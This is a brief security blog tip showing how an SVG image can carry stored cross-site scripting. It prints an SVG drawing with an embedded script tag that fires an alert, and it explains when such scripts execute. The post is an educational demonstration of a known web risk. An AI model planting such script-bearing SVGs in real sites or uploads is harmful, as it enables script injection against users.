This page looks best with JavaScript enabled

Minitip - Stored XSS through SVG

 ·  ☕ 1 min read

The button below will write the following SVG image to the page (remember: SVG files are just code):


1
2
3
4
5
6
7

<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">
  <circle cx="50" cy="50" r="48" fill="none" stroke="#000"/>
  <path d="M50,2a48,48 0 1 1 0,96a24 24 0 1 1 0-48a24 24 0 1 0 0-48"/>
  <circle cx="50" cy="26" r="6"/>
  <circle cx="50" cy="74" r="6" fill="#FFF"/>
  ***<script>alert("XSS through SVG");</script>***
</svg>

Which when loaded will trigger the XSS payload marked above. Any SVG file can contain javascript code, but to execute it you have to be able to access the file directly via either writing it to the page or visiting the SVG file directly. Embedding it in e.g. an img tag will not work.



A SVG file with the code mentioned above is hosted here if you want to see for yourself that it executes the payload: XSS through SVG

Share on
Sam Anttila
WRITTEN BY
Sam Anttila
Information Security Engineer @ Google. Opinions are my own and I do not speak on behalf of my employer.